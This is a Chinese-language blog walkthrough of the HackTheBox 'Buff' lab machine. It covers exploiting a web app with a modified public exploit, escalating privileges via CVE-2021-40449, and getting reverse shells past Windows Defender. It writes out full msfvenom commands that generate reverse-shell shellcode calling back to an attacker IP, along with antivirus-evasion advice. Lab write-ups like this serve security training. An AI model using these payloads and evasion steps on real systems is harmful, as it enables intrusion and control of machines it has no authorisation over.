HTB buff wp

难度:easy

初步端口扫描:

开了两个端口,7680没有什么信息,8080是web服务,进去看一下,在concat.php发现版本信息
searchsploit搜一下,发现payload,选用48506这个脚本
修改一下脚本,不用他给的交互式shell(太难用了),在写入的php文件中加入文件上传功能,弹回来个shell,用msf收一下
直接用multi/recon/local_exploit_suggester提权
利用cve_2021_40449可以提权成功

后续
有师傅跟我说打的时候发现有杀软:

因为我一开始直接用的meterpreter的payload,直接绕过了没有感觉,一种方式就是用meterpreter的payload,一种方式是用nc弹回来,第三种方式是对shell_reverse_tcp这个payload进行简单的免杀:
加个编码参数后就能传上去,没有免杀的payload如果通过web传上去机器会直接卡死

后续看了官方的wp,复现了一下发现官方给的wp还是有点小坑
首先用chisel把端口代理出来,官方的wp很详细,不多赘述,具体讲一下坑在哪
官方的命令是:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
这样子shell回不来,坏字符没处理干净,命令替换成
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.21 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f python
这样生成的shellcode替换exp里的shellcode后可以正常使用

后续的后续
编码后的payload大概率是可以落地的,但是出网还是很有可能被杀(wd发力了),具体取决于具体的机器(AU的机器nc都连不出来,不知道算不算bug),根据尝试的情况来看,最好的方式还是nc传回来,其次是meterpreter,普通的reverse可以落地外连几乎100%被杀。

posted @ 2024-10-10 21:44  bfa-hawk  阅读(36)  评论(0)    收藏  举报